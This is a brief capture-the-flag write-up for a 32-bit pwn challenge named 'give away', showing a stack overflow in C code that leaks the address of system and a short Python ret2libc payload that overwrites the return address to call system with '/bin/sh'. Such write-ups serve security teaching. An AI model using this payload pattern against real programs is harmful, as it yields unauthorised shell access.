Tags: ret2libc pwn 

Rating:

warm up
```c
int main(int argc, const char **argv, const char **envp){
init_buffering(&argc);
printf("Give away: %p\n", &system);
vuln();
return 0;
}
char *vuln(){
char s;
return fgets(&s, 50, stdin);
}
```

ret2libc

```python
offset = 36
payload = 'A'*offset
payload += p32(system) + p32(0) + p32(binsh)
```

[read more](http://taqini.space/2020/05/11/Sharky-CTF-2020-pwn-wp/#give-away-1-276pt)

Original writeup (http://taqini.space/2020/05/11/Sharky-CTF-2020-pwn-wp/#give-away-1-276pt).